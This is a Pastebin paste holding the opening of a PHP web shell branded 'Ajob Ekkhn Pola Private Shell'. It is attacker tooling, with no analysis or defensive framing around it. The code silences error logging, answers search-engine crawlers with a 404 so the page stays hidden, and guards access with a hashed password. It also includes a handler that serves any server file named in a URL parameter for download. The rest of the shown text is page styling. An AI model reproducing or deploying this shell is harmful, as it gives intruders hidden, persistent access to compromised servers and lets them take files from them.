Advertisement
Guest User

Untitled

a guest
Sep 12th, 2019
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 97.93 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "9e94b15ed312fa42232fd87a55db0d39"; //xz
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <link rel="SHORTCUT ICON" href="http://www.clipartbest.com/cliparts/di8/X5M/di8X5M4XT.png">
  31. <title>~~Rooted Syntax~~</title>
  32. <iframe width="1" height="1" src="https://www.youtube.com/embed/LApS9G22cIU?autoplay=1&amp;cc_load_policy=1" frameborder="0" allowfullscreen></iframe>
  33. <style type="text/css">
  34. html {
  35. margin: 20px auto;
  36. background: #000000;
  37. color: green;
  38. text-align: center;
  39. background-image:url(https://38.media.tumblr.com/tumblr_lsudn1Xqjy1qzunn4o1_400.gif);
  40. }
  41. input[type=password] {
  42. width: 300px;
  43. height: 30px;
  44. color: red;
  45. background: #000000;
  46. border: 1px solid #00ff0c;
  47. padding: 5px;
  48. margin-left: 20px;
  49. text-align: center;
  50. }
  51. </style>
  52. </head>
  53. <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
  54. <center>
  55. <p style="color:white;font-size:90px;text-shadow: 0px 0px 30px red , 0px 0px 35px red;font-family:Iceland;font-weight:700;">Ajob Ekkhn Pola Private Shell</p>
  56. </center>
  57. <p style="color:white;text-shadow: 0 0 20px #00ffff, 0px 0px 20px #00ffff ;font-size:35px;font-family:Iceland;margin-top:5px;">.:!----Here----!:.</p><form method="post">
  58. <input type="password" name="pass">
  59. </form>
  60. <?php
  61. exit;
  62. }
  63. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  64. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  65. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  66. else
  67. login_shell();
  68. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  69. @ob_clean();
  70. $file = $_GET['file'];
  71. header('Content-Description: File Transfer');
  72. header('Content-Type: application/octet-stream');
  73. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  74. header('Expires: 0');
  75. header('Cache-Control: must-revalidate');
  76. header('Pragma: public');
  77. header('Content-Length: ' . filesize($file));
  78. readfile($file);
  79. exit;
  80. }
  81. ?>
  82. <html>
  83. <head>
  84. <link rel="SHORTCUT ICON" href="http://www.clipartbest.com/cliparts/di8/X5M/di8X5M4XT.png">
  85. <title>~~~~Ajob Syntax~~~~</title>
  86. <meta charset="UTF-8">
  87. <style type='text/css'>
  88. @import url(https://fonts.googleapis.com/css?family=Iceland);
  89. html {
  90. background: #000000;
  91. color: #ffffff;
  92. font-family: 'Iceland';
  93. font-size: 16px;
  94. width: 100%;
  95. }
  96. li {
  97. display: inline;
  98. margin: 5px;
  99. padding: 5px;
  100. }
  101. table, th, td {
  102. border-collapse:collapse;
  103. font-family: Tahoma, Geneva, sans-serif;
  104. background: transparent;
  105. font-family: 'Iceland';
  106. font-size: 16px;
  107. }
  108. .table_home, .th_home, .td_home {
  109. border: 1px solid #ffffff;
  110. }
  111. th {
  112. padding: 10px;
  113. }
  114. a {
  115. color: #ffffff;
  116. text-decoration: none;
  117. }
  118. a:hover {
  119. color: gold;
  120. text-decoration: underline;
  121. }
  122. b {
  123. color: gold;
  124. }
  125. input[type=text], input[type=password],input[type=submit] {
  126. background: transparent;
  127. color: #ffffff;
  128. border: 1px solid #ffffff;
  129. margin: 5px auto;
  130. padding-left: 5px;
  131. font-family: 'Iceland';
  132. font-size: 16px;
  133. }
  134. textarea {
  135. border: 1px solid #ffffff;
  136. width: 100%;
  137. height: 400px;
  138. padding-left: 5px;
  139. margin: 10px auto;
  140. resize: none;
  141. background: transparent;
  142. color: #ffffff;
  143. font-family: 'Iceland';
  144. font-size: 16px;
  145. }
  146. select {
  147. width: 152px;
  148. background: #000000;
  149. color: lime;
  150. border: 1px solid #ffffff;
  151. margin: 5px auto;
  152. padding-left: 5px;
  153. font-family: 'Iceland';
  154. font-size: 16px;
  155. }
  156. option:hover {
  157. background: lime;
  158. color: #000000;
  159. }
  160. </style>
  161. </head>
  162. <center><h1><span class="blink_text" style="color:white;font-family:Iceland;font-size:65px;text-shadow:0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-weight:700;">.:!-Ajob Ekkhn Pola Private Shell-!:.</span></h1></center>
  163. <style type="text/css">
  164.  
  165. .blink_text {
  166. -webkit-animation-name: blinker;
  167. -webkit-animation-duration: 3s;
  168. -webkit-animation-timing-function: linear;
  169. -webkit-animation-iteration-count: infinite;
  170.  
  171. -moz-animation-name: blinker;
  172. -moz-animation-duration: 3s;
  173. -moz-animation-timing-function: linear;
  174. -moz-animation-iteration-count: infinite;
  175.  
  176. animation-name: blinker;
  177. animation-duration: 3s;
  178. animation-timing-function: linear;
  179. animation-iteration-count: infinite;
  180.  
  181. color: red;
  182. }
  183.  
  184. @-moz-keyframes blinker {
  185. 0% { opacity: 5.0; }
  186. 50% { opacity: 0.0; }
  187. 100% { opacity: 5.0; }
  188. }
  189.  
  190. @-webkit-keyframes blinker {
  191. 0% { opacity: 5.0; }
  192. 50% { opacity: 0.0; }
  193. 100% { opacity: 5.0; }
  194. }
  195.  
  196. @keyframes blinker {
  197. 0% { opacity: 5.0; }
  198. 50% { opacity: 0.0; }
  199. 100% { opacity: 5.0; }
  200. }
  201.  
  202. </style>
  203. <?php
  204.  
  205. ?>
  206. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement